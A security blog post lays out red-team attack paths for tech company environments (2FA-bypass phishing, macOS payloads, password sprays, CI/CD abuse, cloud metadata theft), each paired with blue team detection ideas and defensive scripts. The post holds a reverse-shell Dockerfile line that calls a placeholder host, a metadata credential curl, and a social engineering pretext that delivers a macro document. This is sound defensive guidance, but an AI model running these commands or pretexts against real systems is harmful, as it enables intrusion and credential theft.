Purple Team Candidates for Modern Tech Environments

Cedric Owens
Red Teaming with a Blue Team Mentality
15 min read · Sep 11, 2020

This post discusses purple team exercise inputs based on common red team techniques and attack paths, along with defensive considerations for modern tech environments. It is not all-encompassing, but it covers some of the most likely attack paths and things blue teams can do to posture for them (proactive purple team exercise scenarios, hunting, tabletop exercises, etc.). As an offensive security engineer who has worked at SF Bay Area tech companies over the past 9 years, I focused this post on the environments and tech stacks most prevalent at these types of companies.

Outside-In Attack Paths

  1. Phishing

Phishing remains the top vector remote attackers leverage to gain access to an employee’s credentials or system. To help combat this, many organizations have rolled out two-factor authentication (2FA) so that credentials alone are not sufficient for authentication. However, attack capabilities have evolved as well, and there are now tools and techniques available to remotely bypass most forms of 2FA (the exception being U2F). Below are some common phishing tools used to capture or bypass 2FA protections:

— — — — — — — — — — — — — —

  • Cred Harvest w/2FA Bypass Phishing

Example Tools: EvilGinx2 (https://github.com/kgretzky/evilginx2), CredSniper (https://github.com/ustayready/CredSniper), Modlishka (https://github.com/drk1wi/Modlishka)

Each of the three tools above works differently, but in a nutshell each is able to capture or intercept credentials as well as 2FA tokens during the login process, allowing the attacker to obtain the session cookie and log in as the targeted user. If the target is a corporate identity-as-a-service portal such as Okta or OneLogin, this attack path gives the attacker access to a lot of important data sources, such as email, file storage, and various other apps (including messaging apps or apps with access to sensitive data or customer information). I wrote a separate post on EvilGinx2 attacks against Okta and OneLogin portals.

This attack path could be detrimental to an organization, and the attacker may not even need to drop a shell on a system in order to access sensitive data. It also may go undetected in various environments since it involves cloud or SaaS services. Below are some blue team considerations for proactively examining this attack path along with detections and response procedures:

Blue Team Considerations:

  • Can we identify suspicious login sources for our login portals? A useful data point is the “New sign-on notification” for Okta (and similar equivalents for other providers), which sends an email notifying the user that a portal sign-on has been seen from a new source. If Okta is configured to alert on new sign-on detections, this alert should fire anytime an EvilGinx2 man-in-the-middle attack has succeeded. Having the blue team receive these alerts and immediately reach out to the identified user to investigate may help identify this attack early on.
  • Do we have the ability to identify compromised tokens/cookies for publicly facing login portals (ex: Office 365, Okta, OneLogin, etc.)? One indicator might be a user logging in simultaneously from different geos/regions. There may be edge cases where this legitimately happens in your environment, but I think it is a good starting point to drill down on (a minimal correlation sketch follows this list).
  • Do we have the ability to revoke compromised tokens/cookies? If so, what does that workflow/process look like? Do we need to engage other teams to accomplish this? These are important questions because a simple password rotation on the compromised account would not be sufficient to boot an attacker using this attack path: the attacker’s stolen login tokens/cookies remain valid even after the password has been reset.
  • Specific to identity-as-a-service login portals like Okta and OneLogin: are there any apps/tiles that can be accessed remotely without needing VPN or 2FA once a user is logged in? This is worth considering because any key apps with sensitive information that are not protected by 2FA or VPN would be directly accessible to an attacker who has gained access to a target user’s login portal using one of the 2FA phishing tools above. I recommend that blue teams proactively look at this and work with the appropriate teams to move as many apps as possible (especially those with sensitive content or powerful access levels) behind VPN and 2FA. That way, even if an attacker compromises a user’s credentials and accesses their login portal, very limited options are available to the attacker.
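As a rough illustration of the geo correlation idea above, here is a minimal sketch (not tied to any specific provider). It assumes you can export portal sign-in events as JSON lines with user, timestamp, and country fields; those field names are placeholders for whatever your log export actually uses:

```python
# Hypothetical sketch: flag users whose portal sign-ins come from multiple
# countries within a short window. Field names (user, timestamp, country)
# are assumptions about your sign-in log export, not any vendor's schema.
import json
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)

def load_events(path):
    with open(path) as f:
        for line in f:
            e = json.loads(line)
            yield e["user"], datetime.fromisoformat(e["timestamp"]), e["country"]

def flag_impossible_travel(path):
    by_user = defaultdict(list)
    for user, ts, country in load_events(path):
        by_user[user].append((ts, country))
    for user, events in by_user.items():
        events.sort()
        # compare each sign-in to the next one chronologically
        for (t1, c1), (t2, c2) in zip(events, events[1:]):
            if c1 != c2 and (t2 - t1) <= WINDOW:
                print(f"[!] {user}: sign-ins from {c1} and {c2} within {t2 - t1}")

if __name__ == "__main__":
    flag_impossible_travel("portal_signins.jsonl")
```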

— — — — — — — — — — — — — —

  • Payload-Based Phishing

Another remote phishing vector is payload-based phishing. Since most Bay Area tech companies primarily issue macOS endpoints to users, I will focus on those types of payloads. These payloads may be sent as an attachment or as a link to download the payload from a remote server.

Example macOS Phishing Payloads:

  • Office docs with malicious macros: Example macro generator tools include macphish (https://github.com/cldrn/macphish) and a macro generator for EvilOSX that I wrote (https://github.com/cedowens/EvilOSX_MacroGenerator). In most instances these macros spawn the default macOS shell, which then spawns python (where the post-exploitation code lives).
  • Blue Team Considerations: Check what type of parent-child process detections you have for macOS systems. Examples include any MS Office product spawning /bin/zsh, /bin/sh, or /bin/bash; a single python parent process spawning several /bin/zsh, /bin/sh, or /bin/bash children over a short period of time; and python spawning osascript. These parent-child relationship detections would catch the macro activity described above (a rough hunting sketch follows this list). I have not yet found a solid way to run macro payloads natively in Swift without needing a scripting language like python at all, but doing so would bypass these parent-child process detections.
  • Malicious .app packages: After macOS 10.14.5, Apple required (via Gatekeeper) that any .app packages be both signed and notarized in order to help reduce the chances of malicious apps being executed on mac devices. However, the notarization process has been found to have its own set of issues in that several red team apps as well as real malware have been successfully notarized by Apple. You can read about the real malware examples here in Patrick Wardle’s blog: https://objective-see.com/blog/blog_0x4E.html. I also wrote up steps on how I was able to get my red team apps (JXA apps) signed and notarized by Apple in the past: https://medium.com/red-teaming-with-a-blue-team-mentaility/launching-apfell-programmatically-c90fe54cad89. Chris Ross (also known as xorrior) also wrote a post on another method to get red team apps notarized here: https://posts.specterops.io/sparkling-payloads-a2bd017095c.
  • Blue Team Considerations: By default, macOS apps have a unique user agent string used when making outbound web requests. This can certainly be changed, so this is a detection recommendation for apps that use the default user agents. Those user agents would be something like: <.app_name>/<.app_version> CFNetwork/<version> Darwin/<version>. So filtering and stacking on unique user agents observed across the network would help identify this type of activity. Another idea (may not be very feasible, depending on what capabilities are available in your environment) would be to inventory any unique apps downloaded to any of your mac endpoints and look at activity around those apps (ex: how they were downloaded and if anything else was downloaded around that time).
  • Malicious browser extensions: Chris Ross also wrote a post on how to build and deliver Chrome extensions: https://posts.specterops.io/no-place-like-chrome-122e500e421f. Since most endpoint security products that I am aware of focus on the operating system rather than what happens inside the browser, malicious browser extensions may still go undetected in various environments.
  • Blue Team Considerations: Since the delivery mechanism mentioned by Chris Ross in his post above is a silent delivery, he identified this as a detection methodology: look for variations of “profiles install” command line executions. This is because the actual command line execution in this case would be something like: profiles install -type=configuration -path=/path/to/profile.mobileconfig.
  • Masquerading Files: A recent threat intel report on Shlayer macOS malware discussed a real-world example where users were redirected to malicious sites that downloaded a .dmg containing a shell script masquerading as a .app package, along with instructions on how to run it. The link to the article is here: https://www.intego.com/mac-security-blog/new-mac-malware-reveals-google-searches-can-be-unsafe/. Once the user downloaded the .dmg and executed the shell script (masquerading as a .app), it launched an embedded .app package that downloaded Flash along with malware. Even though this seems a bit low on the sophistication scale, the technique is recent and did infect machines, so it still works.
  • Blue Team Considerations: This attack is harder to give a general recommendation for since it can be implemented in various ways (ex: python instead of bash, downloading an app versus embedding one, etc.). However, I think it would make a fine purple team exercise where this type of attack is run and the team then collaboratively searches for artifacts, processes, parent-child relationships, or any other anomalies that can be leveraged to build a meaningful detection. A rough sketch of what some of these detection starting points might look like follows this list.
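As a rough illustration of the detection ideas referenced above (the parent-child process relationships and the shell-script-from-a-mounted-.dmg case), here is a minimal hunting sketch. It assumes you can export macOS process events as JSON lines with parent_name, process_name, and cmdline fields; those names are placeholders rather than any particular EDR product’s schema:

```python
# Hypothetical hunting sketch over macOS process events exported as JSON lines.
# Field names (parent_name, process_name, cmdline) are assumptions about your
# telemetry export, not any specific product's schema.
import json

OFFICE_PARENTS = {"Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint"}
SHELLS = {"zsh", "sh", "bash", "/bin/zsh", "/bin/sh", "/bin/bash"}

def hunt(path):
    for line in open(path):
        e = json.loads(line)
        parent = e.get("parent_name", "")
        child = e.get("process_name", "")
        cmd = e.get("cmdline", "")
        # Macro-style activity: an Office app spawning a shell
        if parent in OFFICE_PARENTS and child in SHELLS:
            print(f"[office->shell] {parent} -> {child}: {cmd}")
        # Post-exploitation scripting: python driving AppleScript
        if "python" in parent.lower() and "osascript" in child:
            print(f"[python->osascript] {parent} -> {child}: {cmd}")
        # Masquerading case: a shell interpreter executing a script from a mounted .dmg
        if child in SHELLS and "/Volumes/" in cmd:
            print(f"[shell-from-dmg] {parent} -> {child}: {cmd}")

if __name__ == "__main__":
    hunt("process_events.jsonl")
```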

2. Social Engineering

Phishing is technically social engineering, but I chose to break the two out in order to dig more deeply into each. For social engineering, one interesting attack path is targeting publicly facing teams/business units. Good examples include sales teams that take inbound calls or customer support teams that take cases from a phone line or a support web form. Since these are paths through which members of the general public can interact with your employees, they warrant some attention from a defensive perspective. An example attack path against a sales team might be:

  1. Call the publicly facing sales phone number
  2. Pretend to be a business that is interested in the service/product
  3. Build rapport with the sales rep. Ask for their work email address for a follow-up message. Maybe even mention that you have a proposal document that you want them to view and will send it after the call
  4. Exchange some emails afterwards with follow-up questions to build more rapport
  5. Send the “proposal document” (which is a weaponized doc with a macro)
  6. Mention that your company does weird things with graphics and therefore macros must be enabled to view the content
  7. Wait and see what happens
  • Blue Team Considerations: This type of social engineering attack path could be used as an initial entry point into the environment. I recommend running this type of test internally and seeing how far you can get. The outcome might be tightened security procedures around certain parts of the sales or support intake processes, as well as training on when and how to report suspicious requests or how to validate a requestor’s identity. The end goal is to instill a mindset of vigilance in any publicly facing teams (i.e., “since you are a publicly facing team, you are likely to be targeted at some point, so here are the procedures and steps we should follow…”) so that they respond adequately in the event they are targeted.

3. Public Asset Discovery

Knowledge of what services/servers/devices your organization has that are publicly exposed is essential to building a strategy around protecting those assets. Those assets may be hosted on-prem in a data center or may be hosted by a cloud provider. Some methods of discovery are listed below:

  • Searching internet registries (ARIN, AFRINIC, RIPE, LACNIC, and APNIC) for your company to find its AS numbers. Once you have the AS numbers belonging to your company, you can find which network blocks correspond to each one; those are the public netblocks your org owns and that you will want to canvass to see what is hosted publicly there.
  • Example Shodan searches: “net:[netblock]”, “org:[company]”, “ssl:[company]”, etc. The Shodan ssl search is very helpful for finding assets owned by your organization but hosted with cloud providers (ex: AWS, GCP, Azure, Digital Ocean, etc.). A small query sketch follows this list.
  • Searching for open buckets: There are lots of tools that can do this, but one really neat tool I learned about recently in Beau Bullock’s “Breaching The Cloud” course is cloud_enum: https://github.com/initstring/cloud_enum. This is a multi-cloud OSINT tool that aims to enumerate public resources in AWS, Azure, and GCP. You can feed it your company’s domain along with the names of key products or services, and it will use those to try to find open buckets.
  • Cloud asset enumeration: Tools like Cloudbrute (https://github.com/0xsha/CloudBrute) can do this type of enumeration relatively quickly.
  • PowerMeta tool by Beau Bullock for finding publicly available files hosted on various websites using crafted Google and Bing searches: https://github.com/dafthack/PowerMeta
  • Searching for exposed secrets: There are lots of different approaches for finding secrets (credentials, keys, tokens, etc.). Some helpful tools include gitrob (https://github.com/michenriksen/gitrob), gitleaks (https://github.com/zricethezav/gitleaks), and trufflehog (https://github.com/dxa4481/truffleHog). You can also use Google dorks to search for your org’s credentials on pastebin, for exposed sensitive documents, etc.
  • DNS subdomain brute forcing and certificate transparency logs: Both may be helpful for identifying additional hosts owned by your org. There are a ton of DNS brute-forcing tools; Gobuster is one of the better ones: https://github.com/OJ/gobuster.
  • Blue Team Considerations: I recommend that blue teams proactively get a pulse on what is publicly exposed using the methods above and by working with the teams that manage those parts of the company infrastructure. This would help with identifying who to reach out to during incidents affecting those assets. This would also give blue teams the chance to identify what assets they have logs for and to build a plan to gain the necessary log sources from hosts they do not have logs for.
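For the Shodan searches mentioned above, here is a small sketch using the official shodan Python package (assuming you have an API key). The queries and the key are placeholders to adapt for your own org:

```python
# Hypothetical sketch: stack up externally visible hosts/ports for an org
# using Shodan search filters (net:, org:, ssl:). API key and queries are
# placeholders, not real values.
import shodan

API_KEY = "YOUR_SHODAN_API_KEY"
QUERIES = ['org:"Example Corp"', 'ssl:"Example Corp"', "net:203.0.113.0/24"]

def enumerate_exposure():
    api = shodan.Shodan(API_KEY)
    seen = set()
    for query in QUERIES:
        results = api.search(query)
        for match in results.get("matches", []):
            key = (match.get("ip_str"), match.get("port"))
            if key in seen:
                continue
            seen.add(key)
            print(f"{match.get('ip_str')}:{match.get('port')}  "
                  f"{match.get('org', '')}  {','.join(match.get('hostnames', []))}")

if __name__ == "__main__":
    enumerate_exposure()
```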

4. Password Sprays

Password sprays have become an effective method for easily gaining access to additional accounts (especially if the password policy is weak, such as an 8-character minimum length). There are also tons of different tools available for password spraying attacks. Examples are below:

  • Password Spray toolkit by byt3bl33d3r: https://github.com/byt3bl33d3r/SprayingToolkit
  • Microsoft Online Accounts Spray tool by Beau Bullock: https://github.com/dafthack/MSOLSpray
  • Okta Password Spray: https://github.com/cedowens/oktasprayer
  • Blue Team Considerations: I recommend checking what visibility you have into unsuccessful login attempts at your publicly facing login portals. If you do have visibility into unsuccessful login attempts, are you able to correlate them to identify all users that have been sprayed? Can you identify successes from password sprays? These are helpful things to dig into during a purple team exercise (a simple correlation sketch follows this list).
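Here is a minimal sketch of the correlation idea above: flag a source IP that fails logins against many distinct users in a short window. It assumes failed login events exported as JSON lines with user, source_ip, and timestamp fields (placeholder names), and the threshold and window values are arbitrary starting points to tune:

```python
# Hypothetical sketch: correlate failed portal logins to spot spray patterns,
# i.e. one source IP failing against many distinct users in a short window.
# Field names (user, source_ip, timestamp) are assumptions about your log export.
import json
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)
USER_THRESHOLD = 20  # distinct users per source IP before we call it a spray

def detect_sprays(path):
    attempts = defaultdict(list)  # source_ip -> [(timestamp, user)]
    for line in open(path):
        e = json.loads(line)
        attempts[e["source_ip"]].append((datetime.fromisoformat(e["timestamp"]), e["user"]))
    for ip, events in attempts.items():
        events.sort()
        # sliding window over the sorted attempts from this source IP
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > WINDOW:
                start += 1
            users = {u for _, u in events[start:end + 1]}
            if len(users) >= USER_THRESHOLD:
                print(f"[!] possible spray from {ip}: {len(users)} users within {WINDOW}")
                break

if __name__ == "__main__":
    detect_sprays("failed_logins.jsonl")
```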

Internal Attack Paths

There are also lots of internal attack paths that should be looked at. I will discuss some of those below:

  1. Internal Recon/Discovery:

Once an attacker has gained initial access, some level of recon and host discovery will likely occur in order to identify what other hosts/data/services to target. There are several ways that an attacker may go about this, but here are a few examples:

  • If an attacker lands on an Active Directory joined Windows host, the attacker may dump a list of all computers from AD, look for hosts with interesting names, and then start to probe those hosts to see what ports and services are exposed. The attacker may also dump a list of users and AD groups in order to identify which users are high value (have lots of access or may have access to sensitive data). An attacker could also run an Active Directory password spray in order to attempt to gain additional accounts. A neat tool by Beau Bullock that does this is DomainPasswordSpray: https://github.com/dafthack/DomainPasswordSpray
  • The attacker could start port scanning, beginning with the /24 subnet of the compromised host
  • The attacker may attempt to access internal wiki, SharePoint, Confluence, or Jira sites (or other similar products) in search of valuable information. Sometimes credentials, tokens, keys, network diagrams, installers, and other important information are hosted there, and if no role-based access is implemented, an attacker may be able to view that information, which could lead to further compromise.
  • If the host that an attacker compromises is an AWS or GCP host, the attacker may run a curl request against the metadata service in order to see if any credentials can be viewed. An example request might be: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/. Any exposed credentials there can be downloaded and used by an attacker to access additional resources/data.
  • Blue Team Considerations: Checking what visibility you have into port scans (which subnets can you see port scans on, and which can’t you?) could help identify gaps; a rough flow-log heuristic follows this list. Proactively checking your internal wiki could also turn up all sorts of secrets/data that should not be there, and you can work with the appropriate teams to proactively remove that content.
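One rough heuristic for the port scan visibility question above is to stack, per source host, the number of distinct destination ip:port pairs seen in your flow logs. The sketch below assumes flow records exported as JSON lines with src, dst, and dst_port fields (placeholder names) and an arbitrary threshold to tune:

```python
# Hypothetical sketch: flag internal hosts that touch an unusually large number
# of distinct destination ip:port pairs, a rough port-scan heuristic. Field
# names (src, dst, dst_port) are assumptions about your flow-log export.
import json
from collections import defaultdict

DEST_THRESHOLD = 500  # distinct ip:port pairs before a source looks scan-like

def find_scanners(path):
    targets = defaultdict(set)
    for line in open(path):
        flow = json.loads(line)
        targets[flow["src"]].add((flow["dst"], flow["dst_port"]))
    for src, dests in targets.items():
        if len(dests) >= DEST_THRESHOLD:
            print(f"[!] {src} contacted {len(dests)} distinct ip:port pairs")

if __name__ == "__main__":
    find_scanners("flows.jsonl")
```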

2. CI/CD Hosts/Flow:

Since almost every modern tech company uses CI/CD pipelines to consistently deploy software in a streamlined manner, the CI/CD pipeline will also be a target. Targeting the CI/CD pipeline can also provide a way to access production hosts without needing to pivot and overcome stringent network-based access controls. Some examples of things to look at are below:

  • Checking your CI hosts for misconfigurations. Oftentimes Jenkins is used, and one of the common misconfigurations with Jenkins is leaving the /script (Script Console) page accessible without authentication. If this happens, anyone who can browse to the /script page on that Jenkins host can compromise it by pasting a Groovy reverse shell into the script execution window.
  • Blue Team Considerations: Proactively check each of your Jenkins hosts (in all environments: corp, dev, staging, and prod) and see if the /script page is exposed (a simple checker sketch follows this list). If so, work with the owning teams to have it locked down. Even a dev or staging Jenkins host being compromised can lead to further compromise, since secrets, keys, and other credentials are stored in Jenkins (and those creds might even work in prod).
  • Attempt to deploy malicious code from your org’s git repo all the way through to production. This could be as simple as setting up a git repo with a Dockerfile that has the following content: “CMD (/bin/bash -i >& /dev/tcp/<IP>/<port> 0>&1)”. You could then trigger a Jenkins build, attempt to deploy to a dev, staging, or prod environment, and see if you get access.
  • Blue Team Considerations: This is a simple test that can be run internally to see how far you can get, and it helps gauge the effectiveness of pipeline controls. I recommend running this type of test proactively and working with the associated teams to add more stringent controls if you are able to deploy to prod with relative ease.
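For the Jenkins /script check mentioned above, here is a simple sketch that requests /script on each host without credentials and flags any that return HTTP 200 (an unauthenticated Script Console). The host list is a placeholder; a 403 or a redirect to the login page is the expected healthy response:

```python
# Hypothetical sketch: check whether the Jenkins Script Console (/script) responds
# without authentication. Hosts are placeholders; a 200 with no credentials is
# the condition worth investigating, 403 or a login redirect is expected.
import requests

JENKINS_HOSTS = ["https://jenkins.corp.example.com", "https://jenkins.dev.example.com"]

def check_script_console(hosts):
    for host in hosts:
        url = f"{host}/script"
        try:
            resp = requests.get(url, timeout=10, allow_redirects=False)
        except requests.RequestException as exc:
            print(f"[?] {url}: unreachable ({exc})")
            continue
        if resp.status_code == 200:
            print(f"[!] {url}: Script Console reachable without auth")
        else:
            print(f"[ok] {url}: HTTP {resp.status_code}")

if __name__ == "__main__":
    check_script_console(JENKINS_HOSTS)
```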

3. Secrets stored on user laptops:

In tech environments, engineers and developers often do a lot of their work from their laptops. In that case, they may be accessing cloud resources where they spin up environments for testing code ideas and concepts. With this setup, it is likely that developers and engineers have some secrets stored on their laptops (ex: AWS keys, GCP keys, Azure keys, SSH keys). These secrets are often stored in plain text (or in a sqlite3 db that can be read from), so accessing them is pretty simple once an attacker gets access to an engineer’s laptop. I wrote a proof of concept tool for pulling this type of information from macOS hosts: https://github.com/cedowens/SwiftBelt. This can be a relatively easy and quick way to achieve lateral movement (or even privilege escalation) in an environment.

  • Blue Team Considerations: Detecting (with high fidelity) people accessing locally stored secrets is probably not feasible. But perhaps there can be detections in place for anytime a key/token for a high-powered account is used (or when a high-value asset is logged into)? Then you can baseline the usage of that key and respond accordingly when something outside the norm surfaces (a rough sketch of one way to pull such a baseline is below). This may also be worth looking into during a purple team exercise.
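As one way to start baselining usage of a high-powered key, here is a rough sketch that assumes AWS CloudTrail and boto3: it pulls recent events for a given access key ID and stacks the source IPs so new or unexpected sources stand out. The key ID is a placeholder, and the same idea can be adapted to GCP or Azure audit logs:

```python
# Hypothetical sketch (assuming AWS CloudTrail and boto3): pull recent events for
# a high-value access key and stack the source IPs. The key ID is a placeholder.
import json
from collections import Counter

import boto3

ACCESS_KEY_ID = "AKIAEXAMPLEKEYID"

def baseline_key_usage(access_key_id, max_results=50):
    client = boto3.client("cloudtrail")
    response = client.lookup_events(
        LookupAttributes=[{"AttributeKey": "AccessKeyId", "AttributeValue": access_key_id}],
        MaxResults=max_results,
    )
    sources = Counter()
    for event in response.get("Events", []):
        detail = json.loads(event["CloudTrailEvent"])
        sources[detail.get("sourceIPAddress", "unknown")] += 1
    for ip, count in sources.most_common():
        print(f"{ip}: {count} events")

if __name__ == "__main__":
    baseline_key_usage(ACCESS_KEY_ID)
```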

4. Segmentation Between Environments:

Most modern tech companies have corp (where users live), dev (and maybe staging), and prod environments (where running apps and sensitive data may be stored). Different methods are used, but oftentimes there are network-based controls that separate these environments.

It is always good to proactively assess these controls to verify they are working as expected and that there are no paths around them that would allow someone in corp to go directly to prod.

  • Blue Team Considerations: I recommend proactively performing segmentation testing: identify the subnet ranges for each of your environments, then, starting in corp, see what you can reach in the other environments (and do the same from staging and dev). A minimal connectivity-check sketch is below. Note any anomalies and investigate with the proper teams for resolution.
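Here is a minimal sketch of what a segmentation check could look like: simple TCP connect attempts from one environment toward subnets and ports in another. The subnets and ports are placeholders; you would run this from corp, dev, and staging vantage points and compare what is reachable:

```python
# Hypothetical sketch: simple TCP connect checks toward another environment's
# subnets/ports to spot segmentation gaps. Subnets and ports are placeholders.
import ipaddress
import socket

TARGET_SUBNETS = ["10.20.0.0/28"]        # e.g. a slice of prod address space
PORTS = [22, 443, 3306, 5432]
TIMEOUT = 1.0

def probe(subnets, ports):
    for subnet in subnets:
        for host in ipaddress.ip_network(subnet).hosts():
            for port in ports:
                try:
                    with socket.create_connection((str(host), port), timeout=TIMEOUT):
                        print(f"[!] reachable: {host}:{port}")
                except OSError:
                    pass  # filtered/closed, which is what good segmentation should look like

if __name__ == "__main__":
    probe(TARGET_SUBNETS, PORTS)
```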

The methods mentioned in this post are by no means all-inclusive. These are just some common external and internal attack paths that I wanted to point out, along with ways I think blue teams can proactively prepare for these types of attacks (potentially even using some of them as purple team scenarios). I hope you found this post useful!

Cedric Owens
Red Teaming with a Blue Team Mentality

Red teamer with blue team roots🤓👨🏽‍💻 Twitter: @cedowens